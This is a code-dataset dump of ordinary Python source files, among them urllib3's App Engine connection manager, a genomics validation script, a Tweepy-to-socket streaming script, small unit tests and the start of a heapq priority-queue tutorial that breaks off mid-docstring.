Dataset schema (column: dtype, value summary):
blob_id: string, length 40
directory_id: string, length 40
path: string, length 3 to 616
content_id: string, length 40
detected_licenses: sequence, length 0 to 112
license_type: string, 2 classes
repo_name: string, length 5 to 115
snapshot_id: string, length 40
revision_id: string, length 40
branch_name: string, 777 classes
visit_date: timestamp[us], 2015-08-06 10:31:46 to 2023-09-06 10:44:38
revision_date: timestamp[us], 1970-01-01 02:38:32 to 2037-05-03 13:00:00
committer_date: timestamp[us], 1970-01-01 02:38:32 to 2023-09-06 01:08:06
github_id: int64, 4.92k to 681M, nullable
star_events_count: int64, 0 to 209k
fork_events_count: int64, 0 to 110k
gha_license_id: string, 22 classes
gha_event_created_at: timestamp[us], 2012-06-04 01:52:49 to 2023-09-14 21:59:50, nullable
gha_created_at: timestamp[us], 2008-05-22 07:58:19 to 2023-08-21 12:35:19, nullable
gha_language: string, 149 classes
src_encoding: string, 26 classes
language: string, 1 value
is_vendor: bool, 2 classes
is_generated: bool, 2 classes
length_bytes: int64, 3 to 10.2M
extension: string, 188 classes
content: string, length 3 to 10.2M
authors: sequence, length 1
author_id: string, length 1 to 132
blob_id | directory_id | path | content_id | detected_licenses | license_type | repo_name | snapshot_id | revision_id | branch_name | visit_date | revision_date | committer_date | github_id | star_events_count | fork_events_count | gha_license_id | gha_event_created_at | gha_created_at | gha_language | src_encoding | language | is_vendor | is_generated | length_bytes | extension | content | authors | author_id
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f2d187805986b4813c156c325f0651f991420875 | 898aafc2b28aa68d73a1ed3dd63b62aa775f71cc | /lib/python3.8/site-packages/pip/_vendor/urllib3/contrib/appengine.py | 26e869f35452030771221e5dbcc61029349f6549 | [] | no_license | ChesterNut999/Python_Lab_03_Test_Py_Flask_RestFul_SqlAchemy | 462dc404822043f27e53f932f8149ad3f0315a8d | 5889689cae8b64da4b1706def12c763d6a43b502 | refs/heads/master | 2023-06-22T15:00:58.498000 | 2021-07-13T01:27:47 | 2021-07-13T01:27:47 | 385,432,021 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,034 | py | """
This module provides a pool manager that uses Google App Engine's
`URLFetch Service <https://cloud.google.com/appengine/docs/python/urlfetch>`_.
Example usage::
from pip._vendor.urllib3 import PoolManager
from pip._vendor.urllib3.contrib.appengine import AppEngineManager, is_appengine_sandbox
if is_appengine_sandbox():
# AppEngineManager uses AppEngine's URLFetch API behind the scenes
http = AppEngineManager()
else:
# PoolManager uses a socket-level API behind the scenes
http = PoolManager()
r = http.request('GET', 'https://google.com/')
There are `limitations <https://cloud.google.com/appengine/docs/python/\
urlfetch/#Python_Quotas_and_limits>`_ to the URLFetch service and it may not be
the best choice for your application. There are three options for using
urllib3 on Google App Engine:
1. You can use :class:`AppEngineManager` with URLFetch. URLFetch is
cost-effective in many circumstances as long as your usage is within the
limitations.
2. You can use a normal :class:`~urllib3.PoolManager` by enabling sockets.
Sockets also have `limitations and restrictions
<https://cloud.google.com/appengine/docs/python/sockets/\
#limitations-and-restrictions>`_ and have a lower free quota than URLFetch.
To use sockets, be sure to specify the following in your ``app.yaml``::
env_variables:
GAE_USE_SOCKETS_HTTPLIB : 'true'
3. If you are using `App Engine Flexible
<https://cloud.google.com/appengine/docs/flexible/>`_, you can use the standard
:class:`PoolManager` without any configuration or special environment variables.
"""
from __future__ import absolute_import
import io
import logging
import warnings
from . import _appengine_environ
from ..exceptions import (
HTTPError,
HTTPWarning,
MaxRetryError,
ProtocolError,
TimeoutError,
SSLError,
)
from ..packages.six.moves.urllib.parse import urljoin
from ..request import RequestMethods
from ..response import HTTPResponse
from ..util.retry import Retry
from ..util.timeout import Timeout
try:
from google.appengine.api import urlfetch
except ImportError:
urlfetch = None
log = logging.getLogger(__name__)
class AppEnginePlatformWarning(HTTPWarning):
pass
class AppEnginePlatformError(HTTPError):
pass
class AppEngineManager(RequestMethods):
"""
Connection manager for Google App Engine sandbox applications.
This manager uses the URLFetch service directly instead of using the
emulated httplib, and is subject to URLFetch limitations as described in
the App Engine documentation `here
<https://cloud.google.com/appengine/docs/python/urlfetch>`_.
Notably it will raise an :class:`AppEnginePlatformError` if:
* URLFetch is not available.
* If you attempt to use this on App Engine Flexible, as full socket
support is available.
* If a request size is more than 10 megabytes.
* If a response size is more than 32 megabytes.
* If you use an unsupported request method such as OPTIONS.
Beyond those cases, it will raise normal urllib3 errors.
"""
def __init__(
self,
headers=None,
retries=None,
validate_certificate=True,
urlfetch_retries=True,
):
if not urlfetch:
raise AppEnginePlatformError(
"URLFetch is not available in this environment."
)
warnings.warn(
"urllib3 is using URLFetch on Google App Engine sandbox instead "
"of sockets. To use sockets directly instead of URLFetch see "
"https://urllib3.readthedocs.io/en/latest/reference/urllib3.contrib.html.",
AppEnginePlatformWarning,
)
RequestMethods.__init__(self, headers)
self.validate_certificate = validate_certificate
self.urlfetch_retries = urlfetch_retries
self.retries = retries or Retry.DEFAULT
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
# Return False to re-raise any potential exceptions
return False
def urlopen(
self,
method,
url,
body=None,
headers=None,
retries=None,
redirect=True,
timeout=Timeout.DEFAULT_TIMEOUT,
**response_kw
):
retries = self._get_retries(retries, redirect)
try:
follow_redirects = redirect and retries.redirect != 0 and retries.total
response = urlfetch.fetch(
url,
payload=body,
method=method,
headers=headers or {},
allow_truncated=False,
follow_redirects=self.urlfetch_retries and follow_redirects,
deadline=self._get_absolute_timeout(timeout),
validate_certificate=self.validate_certificate,
)
except urlfetch.DeadlineExceededError as e:
raise TimeoutError(self, e)
except urlfetch.InvalidURLError as e:
if "too large" in str(e):
raise AppEnginePlatformError(
"URLFetch request too large, URLFetch only "
"supports requests up to 10mb in size.",
e,
)
raise ProtocolError(e)
except urlfetch.DownloadError as e:
if "Too many redirects" in str(e):
raise MaxRetryError(self, url, reason=e)
raise ProtocolError(e)
except urlfetch.ResponseTooLargeError as e:
raise AppEnginePlatformError(
"URLFetch response too large, URLFetch only supports"
"responses up to 32mb in size.",
e,
)
except urlfetch.SSLCertificateError as e:
raise SSLError(e)
except urlfetch.InvalidMethodError as e:
raise AppEnginePlatformError(
"URLFetch does not support method: %s" % method, e
)
http_response = self._urlfetch_response_to_http_response(
response, retries=retries, **response_kw
)
# Handle redirect?
redirect_location = redirect and http_response.get_redirect_location()
if redirect_location:
# Check for redirect response
if self.urlfetch_retries and retries.raise_on_redirect:
raise MaxRetryError(self, url, "too many redirects")
else:
if http_response.status == 303:
method = "GET"
try:
retries = retries.increment(
method, url, response=http_response, _pool=self
)
except MaxRetryError:
if retries.raise_on_redirect:
raise MaxRetryError(self, url, "too many redirects")
return http_response
retries.sleep_for_retry(http_response)
log.debug("Redirecting %s -> %s", url, redirect_location)
redirect_url = urljoin(url, redirect_location)
return self.urlopen(
method,
redirect_url,
body,
headers,
retries=retries,
redirect=redirect,
timeout=timeout,
**response_kw
)
# Check if we should retry the HTTP response.
has_retry_after = bool(http_response.getheader("Retry-After"))
if retries.is_retry(method, http_response.status, has_retry_after):
retries = retries.increment(method, url, response=http_response, _pool=self)
log.debug("Retry: %s", url)
retries.sleep(http_response)
return self.urlopen(
method,
url,
body=body,
headers=headers,
retries=retries,
redirect=redirect,
timeout=timeout,
**response_kw
)
return http_response
def _urlfetch_response_to_http_response(self, urlfetch_resp, **response_kw):
if is_prod_appengine():
# Production GAE handles deflate encoding automatically, but does
# not remove the encoding header.
content_encoding = urlfetch_resp.headers.get("content-encoding")
if content_encoding == "deflate":
del urlfetch_resp.headers["content-encoding"]
transfer_encoding = urlfetch_resp.headers.get("transfer-encoding")
# We have a full response's content,
# so let's make sure we don't report ourselves as chunked data.
if transfer_encoding == "chunked":
encodings = transfer_encoding.split(",")
encodings.remove("chunked")
urlfetch_resp.headers["transfer-encoding"] = ",".join(encodings)
original_response = HTTPResponse(
# In order for decoding to work, we must present the content as
# a file-like object.
body=io.BytesIO(urlfetch_resp.content),
msg=urlfetch_resp.header_msg,
headers=urlfetch_resp.headers,
status=urlfetch_resp.status_code,
**response_kw
)
return HTTPResponse(
body=io.BytesIO(urlfetch_resp.content),
headers=urlfetch_resp.headers,
status=urlfetch_resp.status_code,
original_response=original_response,
**response_kw
)
def _get_absolute_timeout(self, timeout):
if timeout is Timeout.DEFAULT_TIMEOUT:
return None # Defer to URLFetch's default.
if isinstance(timeout, Timeout):
if timeout._read is not None or timeout._connect is not None:
warnings.warn(
"URLFetch does not support granular timeout settings, "
"reverting to total or default URLFetch timeout.",
AppEnginePlatformWarning,
)
return timeout.total
return timeout
def _get_retries(self, retries, redirect):
if not isinstance(retries, Retry):
retries = Retry.from_int(retries, redirect=redirect, default=self.retries)
if retries.connect or retries.read or retries.redirect:
warnings.warn(
"URLFetch only supports total retries and does not "
"recognize connect, read, or redirect retry parameters.",
AppEnginePlatformWarning,
)
return retries
# Alias methods from _appengine_environ to maintain public API interface.
is_appengine = _appengine_environ.is_appengine
is_appengine_sandbox = _appengine_environ.is_appengine_sandbox
is_local_appengine = _appengine_environ.is_local_appengine
is_prod_appengine = _appengine_environ.is_prod_appengine
is_prod_appengine_mvms = _appengine_environ.is_prod_appengine_mvms
| [
"[email protected]"
] | |
cfe480d022ad715c760a2b50cc3d97fa9baf03a5 | 5374bd9a9fc8cc07f6966c490a137003ddc64d9b | /VEnCode/scripts/validation.py | 14fa681c8adc40990d15197e91301865df279be4 | [
"BSD-3-Clause"
] | permissive | AndreMacedo88/VEnCode | 31f9f545019f62e0af716395a11961515c229394 | 667c777c6ef12c43e993660e5c695d4d6d43385e | refs/heads/master | 2021-01-06T03:55:44.385885 | 2020-11-24T18:05:38 | 2020-11-24T18:05:38 | 90,248,803 | 0 | 1 | NOASSERTION | 2020-02-04T22:29:39 | 2017-05-04T10:02:48 | Python | UTF-8 | Python | false | false | 4,091 | py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
""" validation.py: file used to cross-validate VEnCodes found using the FANTOM5 data set. """
import os
import sys
import VEnCode.outside_data
file_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(file_dir)
from VEnCode import internals
import VEnCode.internals_extensions as iext
cell_types = {"hips_assay": "hIPS", "hepG2_assay": "hepatocellular carcinoma cell line: HepG2 ENCODE",
"sclc_chr_accessibility_assay": "small cell lung carcinoma cell line",
"sclc_assay": "small cell lung carcinoma cell line", "h82_assay": "small cell lung carcinoma cell line",
"b_lymph_assay": "B lymphoblastoid cell line- GM12878 ENCODE",
"du145_assay": "prostate cancer cell line:DU145",
"pc_3_assay": "prostate cancer cell line:PC-3"}
# Barakat TS, 2018 assays:
# hips_assay = iext.Assay("BarakatTS2018", "sampling", celltype="hIPS", data="core", parsed=False)
validate_with = internals.BarakatTS2018Data(data="core")
hips_assay_val = iext.Assay("BarakatTS2018", "sampling", celltype="hIPS", data="core", parsed=False,
validate_with=validate_with)
hips_assay_val.to_csv()
# Inoue F, 2017 assays:
hepG2_assay = iext.Assay("InoueF2017", "sampling", celltype="hepatocellular carcinoma cell line: HepG2 ENCODE")
hepG2_assay.to_csv()
validate_with = internals.InoueF2017Data()
hepG2_assay_val = iext.Assay("InoueF2017", "sampling", celltype="hepatocellular carcinoma cell line: HepG2 ENCODE",
validate_with=validate_with)
hepG2_assay_val.to_csv()
# Denny SK, 2016 assays:
sclc_chr_accessibility_assay = iext.Assay("DennySK2016", "sampling",
celltype="small cell lung carcinoma cell line")
# Wang X, 2018 assays:
b_lymph_assay = iext.Assay("WangX2018", "sampling", celltype="B lymphoblastoid cell line: GM12878 ENCODE")
b_lymph_assay.to_csv()
validate_with = internals.Bed("WangX2018")
b_lymph_assay_val = iext.Assay("WangX2018", "sampling", celltype="B lymphoblastoid cell line: GM12878 ENCODE",
validate_with=validate_with)
b_lymph_assay_val.to_csv()
# Christensen CL, 2014 assays:
h82_assay = iext.Assay("ChristensenCL2014", "sampling", celltype="small cell lung carcinoma cell line:NCI-H82",
data="H82", parsed=False)
h82_assay.to_csv()
validate_with = internals.ChristensenCL2014Data(data="H82")
h82_assay_val = iext.Assay("ChristensenCL2014", "sampling", celltype="small cell lung carcinoma cell line:NCI-H82",
data="H82", parsed=False, validate_with=validate_with)
h82_assay_val.to_csv()
h82_controls = iext.NegativeControl("ChristensenCL2014", "sampling", data="H82")
h82_controls.to_csv()
# Liu Y, 2017 assays:
du145_assay = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:DU145", parsed=False)
du145_assay.to_csv()
pc_3_assay = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:PC-3", parsed=False)
pc_3_assay.to_csv()
prostate_cancer_assay = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line", parsed=True)
prostate_cancer_assay.to_csv()
validate_with = internals.BroadPeak("LiuY2017")
du145_assay_val = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:DU145", parsed=False,
validate_with=validate_with)
du145_assay_val.to_csv()
validate_with = internals.BroadPeak("LiuY2017")
pc_3_assay_val = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line:PC-3", parsed=False,
validate_with=validate_with)
pc_3_assay_val.to_csv()
validate_with = VEnCode.outside_data.BroadPeak("LiuY2017")
prostate_cancer_assay_val = iext.Assay("LiuY2017", "sampling", celltype="prostate cancer cell line", parsed=True,
validate_with=validate_with)
prostate_cancer_assay_val.to_csv()
lncap_controls = iext.NegativeControl("LiuY2017", "sampling")
lncap_controls.to_csv()
| [
"[email protected]"
] | |
049f94be6d12bfee0f18ebcd3db8d97694c6293e | 22d8565bf563adcbc38f666dec3b57a1c3fd11f4 | /build/husky/husky_base/catkin_generated/pkg.installspace.context.pc.py | 84e0ed79d5a30c4ff0815b97e19969e016fab682 | [] | no_license | JJHbrams/DynamoP2.0 | 4c4160fcb81b7d6a4f2f0ce10e863fd8aa190a82 | a0d554b0620ac90ea3388ec3c2f5225baa6237c3 | refs/heads/master | 2021-01-03T19:55:42.136766 | 2020-11-11T04:42:43 | 2020-11-11T04:42:43 | 240,215,298 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include;/usr/include".split(';') if "${prefix}/include;/usr/include" != "" else []
PROJECT_CATKIN_DEPENDS = "diagnostic_updater;hardware_interface;husky_msgs;roscpp;sensor_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lhorizon_legacy;/usr/lib/x86_64-linux-gnu/libboost_chrono.so;/usr/lib/x86_64-linux-gnu/libboost_system.so".split(';') if "-lhorizon_legacy;/usr/lib/x86_64-linux-gnu/libboost_chrono.so;/usr/lib/x86_64-linux-gnu/libboost_system.so" != "" else []
PROJECT_NAME = "husky_base"
PROJECT_SPACE_DIR = "/home/mrjohd/Kinodynamic_ws/install"
PROJECT_VERSION = "0.4.2"
| [
"[email protected]"
] | |
ed05634f40ffd828dade32145311476d092888ca | 951bd2ae0de80ebb03cdb5214d06c71b617dbdf6 | /Spark Streaming/TweetRead.py | 744587f609d2ff6dfff0cce8154dc29f2d82a2bd | [] | no_license | albertopformoso/Spark-and-Python-for-Big-Data-with-PySpark | c259fdc1d18e43dd4dbdbfa60c8eaff3080a2781 | 8789a0f0b218a46bd9accca27ca8faaea2ed7cdc | refs/heads/master | 2023-02-23T02:12:38.730739 | 2021-01-24T19:26:29 | 2021-01-24T19:26:29 | 330,278,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,681 | py | from dotenv import load_dotenv, find_dotenv
import tweepy
from tweepy import OAuthHandler
from tweepy import Stream
from tweepy.streaming import StreamListener
import socket
import json
import os
if len(find_dotenv()) == 0:
raise RuntimeError("Can't find your .env file")
# Set up your credentials
consumer_key = os.getenv('API_KEY')
consumer_secret= os.getenv('API_SECRET_KEY')
access_token = os.getenv('ACCESS_TOKEN')
access_secret = os.getenv('ACCESS_TOKEN_SECRET')
class TweetsListener(StreamListener):
def __init__(self, csocket):
self.client_socket = csocket
def on_data(self, data):
try:
msg = json.loads( data )
print( msg['text'].encode('utf-8') )
self.client_socket.send( msg['text'].encode('utf-8') )
return True
except BaseException as e:
print("Error on_data: %s" % str(e))
return True
def on_error(self, status):
print(status)
return True
def sendData(c_socket):
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_secret)
twitter_stream = Stream(auth, TweetsListener(c_socket))
twitter_stream.filter(track=['guitar'])
if __name__ == "__main__":
s = socket.socket() # Create a socket object
host = "127.0.0.1" # Get local machine name
port = 5555 # Reserve a port for your service.
s.bind((host, port)) # Bind to the port
print("Listening on port: %s" % str(port))
s.listen(5) # Now wait for client connection.
c, addr = s.accept() # Establish connection with client.
print( "Received request from: " + str( addr ) )
sendData( c )
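    # A minimal consumer sketch (illustrative; `sc` is an assumed SparkContext,
    # not defined in this script):
    #   from pyspark.streaming import StreamingContext
    #   ssc = StreamingContext(sc, batchDuration=10)
    #   lines = ssc.socketTextStream("127.0.0.1", 5555)
    #   lines.pprint()
    #   ssc.start(); ssc.awaitTermination()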
| [
"[email protected]"
] | |
f6e7f7cf4f1a49aa64ffb503f49ad5eeb1ce2097 | c6b15c628a185d9f71c91543aac3a90495152c09 | /Python Unit-Testing Course/.idea/VirtualEnvironment/Scripts/easy_install-3.7-script.py | 42bf3bd2e8c73d16b39b6f563df885427bd62bc2 | [] | no_license | reichlj/PythonBsp | 3e47d3b22b75cf1f67d3e47b83b125a1ddbc518d | 51c25370495d3a8847f46a9de1bc8e0d811ae5a7 | refs/heads/master | 2021-06-12T22:32:15.365906 | 2021-05-08T20:44:01 | 2021-05-08T20:44:01 | 173,499,716 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | #!"C:\dev\PythonBsp\Python Unit-Testing Course\.idea\VirtualEnvironment\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"[email protected]"
] | |
37e98194ea73e6a1e99634dbf212cd5d261da891 | 3fbfabfaaada7b9b77e8a1df8fed4de444070d49 | /session_10/create_db.py | c1c70ca97f2955670dfb74a0e794333f80293c9c | [
"MIT"
] | permissive | dravate/spark_python_course | df36a561ab2cf8f763dd02655319cd6bf5b7876c | 519389fdb21d78cd6d19e1ad2f7c782bc1449a83 | refs/heads/main | 2023-07-08T06:53:27.635106 | 2021-08-03T14:44:55 | 2021-08-03T14:44:55 | 385,127,461 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | import os
import sqlite3
db_filename = 'todo.db'
new_db = not os.path.exists(db_filename)
conn = sqlite3.connect(db_filename)
if new_db:
print ("Please create Schema")
else:
print ("DB is already created - mostly the schema exists")
conn.close()
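# A possible schema sketch for the first run (illustrative; the course
# material defines the real schema), to be run before conn.close():
#   conn.executescript("""
#       CREATE TABLE todo (
#           id INTEGER PRIMARY KEY AUTOINCREMENT,
#           details TEXT,
#           status INTEGER
#       );""")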
| [
"[email protected]"
] | |
170b7b398ab61f3b24b1986299996fa4ce73ce29 | d24a6e0be809ae3af8bc8daa6dacfc1789d38a84 | /other_contests/PAST2019/H.py | 5b5e04e27939ddcd508e3e8a2e1ea67db3e4dc3d | [] | no_license | k-harada/AtCoder | 5d8004ce41c5fc6ad6ef90480ef847eaddeea179 | 02b0a6c92a05c6858b87cb22623ce877c1039f8f | refs/heads/master | 2023-08-21T18:55:53.644331 | 2023-08-05T14:21:25 | 2023-08-05T14:21:25 | 184,904,794 | 9 | 0 | null | 2023-05-22T16:29:18 | 2019-05-04T14:24:18 | Python | UTF-8 | Python | false | false | 1,782 | py | def solve(n, c_list, q, s_list):
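    # Commentary added for clarity: instead of updating every element on the
    # bulk queries, the solution keeps lazy decrements -- one shared by all
    # positions (global_dec), one extra for odd positions in 1-based indexing
    # (odd_dec), and a per-position one (dec_list_n). The running minima
    # (global_min, odd_min) let each bulk query be accepted or rejected in
    # O(1) by checking that no element would drop below zero.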
res = 0
dec_list_n = [0] * n
global_dec = 0
odd_dec = 0
global_min = min(c_list)
odd_min = min(c_list[0::2])
for i in range(q):
s = s_list[i]
if s[0] == "1":
_, x, a = map(int, s.split())
x -= 1
if x % 2 == 0:
x_res = c_list[x] - global_dec - odd_dec - dec_list_n[x]
if x_res >= a:
dec_list_n[x] += a
res += a
odd_min = min(odd_min, x_res - a)
global_min = min(global_min, x_res - a)
else:
x_res = c_list[x] - global_dec - dec_list_n[x]
if x_res >= a:
dec_list_n[x] += a
res += a
global_min = min(global_min, x_res - a)
elif s[0] == "2":
_, a = map(int, s.split())
if odd_min >= a:
odd_dec += a
odd_min -= a
res += a * ((n + 1) // 2)
global_min = min(global_min, odd_min)
else:
_, a = map(int, s.split())
if global_min >= a:
global_dec += a
global_min -= a
odd_min -= a
res += a * n
return res
def main():
n = int(input())
c_list = list(map(int, input().split()))
q = int(input())
s_list = [""] * q
for i in range(q):
s = input()
s_list[i] = s
res = solve(n, c_list, q, s_list)
print(res)
def test():
assert solve(4, [5, 3, 3, 5], 6, ["1 2 1", "2 2", "2 2", "3 100", "3 1", "1 1 3"]) == 9
assert solve(2, [3, 4], 3, ["1 2 9", "2 4", "3 4"]) == 0
if __name__ == "__main__":
test()
main()
| [
"[email protected]"
] | |
2ebb4a3c821548b4cd7fbbd2eed1c70047122136 | e26cfc715513ae3b4393ea918e78ed5f27664dff | /src/textgrid_tools_tests/intervals/common_py/test_merge_intervals.py | f9d043c5f90ec45d259c06d011eee8b6db3d3313 | [
"MIT"
] | permissive | stefantaubert/textgrid-ipa | f4cd52b2c9d53570587b030dec758176229ee5e0 | ada294513315d76db7e91cbbfb7c386a75f84966 | refs/heads/main | 2023-06-09T01:30:18.159171 | 2023-05-30T15:23:18 | 2023-05-30T15:23:18 | 301,960,070 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 965 | py | from textgrid.textgrid import Interval
from textgrid_tools.intervals.common import merge_intervals
def test_component_include_empty():
intervals = (
Interval(0, 1, ""),
Interval(1, 2, "b"),
Interval(2, 3, " "),
Interval(3, 4, "c"),
Interval(4, 5, "d"),
)
result = merge_intervals(list(intervals), "X", False)
assert_interval = Interval(0, 5, "XbX XcXd")
assert result.minTime == assert_interval.minTime
assert result.maxTime == assert_interval.maxTime
assert result.mark == assert_interval.mark
def test_component_ignore_empty():
intervals = (
Interval(0, 1, ""),
Interval(1, 2, "b"),
Interval(2, 3, " "),
Interval(3, 4, "c"),
Interval(4, 5, "d"),
)
result = merge_intervals(list(intervals), "X", True)
assert_interval = Interval(0, 5, "bX XcXd")
assert result.minTime == assert_interval.minTime
assert result.maxTime == assert_interval.maxTime
assert result.mark == assert_interval.mark
| [
"[email protected]"
] | |
103c351cc0110671b6dbd67e7c9bb14049d877a7 | 57235e5fbd29dc5e0b3f24649e15a48935edd65f | /boa3_test/test_sc/list_test/PopListMismatchedTypeArgument.py | 4ae5589168d11ccf6d57b6d11b7eecfc3dd0b849 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] | permissive | DanPopa46/neo3-boa | ae75543bdc4e0aeadf45578b6b5e4c45b9253557 | e4ef340744b5bd25ade26f847eac50789b97f3e9 | refs/heads/development | 2023-04-01T19:25:08.216180 | 2021-04-15T17:45:38 | 2021-04-15T17:45:38 | 358,663,228 | 0 | 0 | Apache-2.0 | 2021-04-16T16:46:46 | 2021-04-16T16:46:31 | null | UTF-8 | Python | false | false | 79 | py | def pop_test() -> int:
a = [1, 2, 3, 4, 5]
b = a.pop('2')
return b
| [
"[email protected]"
] | |
11f859a7d2ceaac0b717f0b785430b13ea39ee51 | cff2b7c96ca0355a44116f6d18f026da69e412b0 | /script.module.Galaxy/lib/resources/lib/modules/youtube.py | aad8ebbdf56a5370160d29b30a05da9d5af36820 | [
"Beerware"
] | permissive | krazware/therealufo | cc836e4e7049d277205bb590d75d172f5745cb7d | 4d6341c77e8c2cc9faec0f748a9a2d931b368217 | refs/heads/master | 2020-03-19T00:41:22.109154 | 2019-11-12T05:06:14 | 2019-11-12T05:06:14 | 135,496,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,193 | py | # -*- coding: UTF-8 -*-
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @tantrumdev wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ----------------------------------------------------------------------------
#######################################################################
# Addon Name: Galaxy
# Addon id: plugin.video.Galaxy
# Addon Provider: The Martian
import re,json
from resources.lib.modules import client
from resources.lib.modules import workers
class youtube(object):
def __init__(self, key=''):
self.list = [] ; self.data = []
self.base_link = 'http://www.youtube.com'
self.key_link = '&key=%s' % key
self.playlists_link = 'https://www.googleapis.com/youtube/v3/playlists?part=snippet&maxResults=50&channelId=%s'
self.playlist_link = 'https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&maxResults=50&playlistId=%s'
self.videos_link = 'https://www.googleapis.com/youtube/v3/search?part=snippet&order=date&maxResults=50&channelId=%s'
self.content_link = 'https://www.googleapis.com/youtube/v3/videos?part=contentDetails&id=%s'
self.play_link = 'plugin://plugin.video.youtube/play/?video_id=%s'
def playlists(self, url):
url = self.playlists_link % url + self.key_link
return self.play_list(url)
def playlist(self, url, pagination=False):
cid = url.split('&')[0]
url = self.playlist_link % url + self.key_link
return self.video_list(cid, url, pagination)
def videos(self, url, pagination=False):
cid = url.split('&')[0]
url = self.videos_link % url + self.key_link
return self.video_list(cid, url, pagination)
def play_list(self, url):
try:
result = client.request(url)
result = json.loads(result)
items = result['items']
except:
pass
for i in range(1, 5):
try:
if not 'nextPageToken' in result: raise Exception()
next = url + '&pageToken=' + result['nextPageToken']
result = client.request(next)
result = json.loads(result)
items += result['items']
except:
pass
for item in items:
try:
title = item['snippet']['title']
title = title.encode('utf-8')
url = item['id']
url = url.encode('utf-8')
image = item['snippet']['thumbnails']['high']['url']
if '/default.jpg' in image: raise Exception()
image = image.encode('utf-8')
self.list.append({'title': title, 'url': url, 'image': image})
except:
pass
return self.list
def video_list(self, cid, url, pagination):
try:
result = client.request(url)
result = json.loads(result)
items = result['items']
except:
pass
for i in range(1, 5):
try:
if pagination == True: raise Exception()
if not 'nextPageToken' in result: raise Exception()
page = url + '&pageToken=' + result['nextPageToken']
result = client.request(page)
result = json.loads(result)
items += result['items']
except:
pass
try:
if pagination == False: raise Exception()
next = cid + '&pageToken=' + result['nextPageToken']
except:
next = ''
for item in items:
try:
title = item['snippet']['title']
title = title.encode('utf-8')
try: url = item['snippet']['resourceId']['videoId']
except: url = item['id']['videoId']
url = url.encode('utf-8')
image = item['snippet']['thumbnails']['high']['url']
if '/default.jpg' in image: raise Exception()
image = image.encode('utf-8')
append = {'title': title, 'url': url, 'image': image}
if not next == '': append['next'] = next
self.list.append(append)
except:
pass
try:
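            # batch the collected video ids into groups of 50 (the API's
            # per-request limit) and build one contentDetails URL per batch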
u = [range(0, len(self.list))[i:i+50] for i in range(len(range(0, len(self.list))))[::50]]
u = [','.join([self.list[x]['url'] for x in i]) for i in u]
u = [self.content_link % i + self.key_link for i in u]
threads = []
for i in range(0, len(u)):
threads.append(workers.Thread(self.thread, u[i], i))
self.data.append('')
[i.start() for i in threads]
[i.join() for i in threads]
items = []
for i in self.data: items += json.loads(i)['items']
except:
pass
for item in range(0, len(self.list)):
try:
vid = self.list[item]['url']
self.list[item]['url'] = self.play_link % vid
d = [(i['id'], i['contentDetails']) for i in items]
d = [i for i in d if i[0] == vid]
d = d[0][1]['duration']
duration = 0
try: duration += 60 * 60 * int(re.findall('(\d*)H', d)[0])
except: pass
try: duration += 60 * int(re.findall('(\d*)M', d)[0])
except: pass
try: duration += int(re.findall('(\d*)S', d)[0])
except: pass
duration = str(duration)
self.list[item]['duration'] = duration
except:
pass
return self.list
def thread(self, url, i):
try:
result = client.request(url)
self.data[i] = result
except:
return | [
"[email protected]"
] | |
67cfe06d88e3de17422ae039a63a853c1b86bb5e | 064190a2de1ad156e1060f0efdee7e754a96b4bb | /Unit1/1.5.py | 07c1c3c95a554ba8ca6b0432b654b42f2fe5c8eb | [] | no_license | zqy1/pythonCookbook | 7254fadf3fac277b107941bc32e4716de3f7c329 | 89a05a2a4d723fb49548e0e87d2542bd5d07fbee | refs/heads/master | 2020-08-03T17:27:09.351396 | 2015-09-18T13:05:14 | 2015-09-18T13:05:14 | 73,540,483 | 1 | 0 | null | 2016-11-12T08:14:50 | 2016-11-12T08:14:50 | null | UTF-8 | Python | false | false | 1,758 | py | #!/usr/bin/env python
# encoding: utf-8
"""
1.5 Implementing a priority queue

We want to implement a queue that sorts its elements by a given priority and
always returns the highest-priority element on each pop operation.

heapq module functions:
heappush(heap, item)     # push item onto the heap
heappop(heap)            # pop and return the smallest element of the heap
heappushpop(heap, item)  # push item onto the heap, then pop and return the
                         # smallest element
# this is much faster than separate heappush and heappop calls
heapreplace(heap, item)  # pop the smallest element first, then push item
heapify(x)               # heap-sort the list x in place; a min-heap by default
merge(*iterables)        # merge several sorted inputs and re-heapify; returns
                         # an iterable over the merged lists
nlargest                 # used in 1.4; returns the n largest elements
nsmallest                # used in 1.4; returns the n smallest elements
"""
# Use the heapq module to implement a simple priority queue class
import heapq
class PriorityQueue:
"""ไผๅ
